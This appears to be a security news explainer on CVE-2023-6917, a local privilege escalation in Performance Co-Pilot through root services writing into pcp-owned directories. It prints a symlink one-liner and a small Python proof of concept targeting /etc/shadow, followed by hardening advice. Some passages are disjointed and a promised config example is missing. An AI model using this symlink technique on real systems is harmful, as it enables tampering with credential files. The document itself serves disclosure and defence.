CVE CyberSecurity Database News

CVE-2023-6917 - Local Privilege Escalation in Performance Co-Pilot (PCP) via Systemd Privilege Mismanagement

Poster -

---

Introduction

In December 2023, a critical security vulnerability (CVE-2023-6917) was identified in the Performance Co-Pilot (PCP) package. This vulnerability impacts how systemd services are configured and how they interact with file permissions and user privileges. This post will break down what happened, how it works, and what you can do to protect your systems—all in plain, simple language.

What is PCP and Why Does This Matter?

Performance Co-Pilot (PCP) is a toolkit for monitoring and managing system performance on Linux and UNIX systems. In many environments, it runs automatically as part of the OS with privileged systemd services.

It is crucial that different services run under proper privilege levels. For example, low-privileged users and services shouldn't have the same power as root. Unfortunately, the flaw in PCP allowed them to overlap in dangerous ways.

Others run as the all-powerful root user.

If a root service interacts with a directory or file owned by the less-privileged pcp user (especially where symlinks can be planted), the pcp user can escalate privileges by tricking root into following a malicious symlink, overwriting files as root, or accessing data normally restricted.

Find a Directory Owned by pcp

Some systemd root services write files or logs into a location owned by the pcp user, e.g., /var/log/pcp/{some-dir}.

As the pcp user, an attacker creates a symlink in that directory that points to a sensitive root-owned file (like /etc/shadow).

Run as user 'pcp'

ln -s /etc/shadow /var/log/pcp/someservice.log

Trigger the Vulnerable Root Service

Next time the root service writes to /var/log/pcp/someservice.log, it actually overwrites /etc/shadow (or whichever file is the link's target) — with attacker-controlled content or permissions!

Let's see a Python3 PoC

import os

# Attacker as 'pcp' user
os.symlink('/etc/shadow', '/var/log/pcp/exploit.log')

# Now, when the root PCP systemd service writes to /var/log/pcp/exploit.log,
# it will actually be overwriting /etc/shadow!

DANGER: Do NOT run this on your actual system — this is for educational illustration.

Patch Immediately:

If a patch is available from your distro or from pcp.io security advisories, apply it!

Review Systemd Service Files:

Make sure that your systemd PCP services all use the User=pcp and Group=pcp settings where applicable. Example:

Lock Down Directories:

Ensure that directories writable by unprivileged users are NOT used by root processes. If root needs to write logs, use a root-only directory. Use chmod to prevent unnecessary write access.

`bash

chown root:root /var/log/pcp
chmod 755 /var/log/pcp

Official References

- CVE-2023-6917 at NVD
- Performance Co-Pilot Homepage
- PCP Security Advisories
- systemd Service Security

Conclusion

CVE-2023-6917 is a classic case of why privilege separation matters. When low-privilege and root-level processes collide in the same directory, the door is opened for dangerous escalations—all a local attacker needs is the pcp user, some clever symlinks, and a little patience.

Always make sure your services only have the permissions they absolutely need—and not a bit more.

Timeline

Published on: 02/28/2024 15:15:07 UTC
Last modified on: 02/29/2024 13:49:47 UTC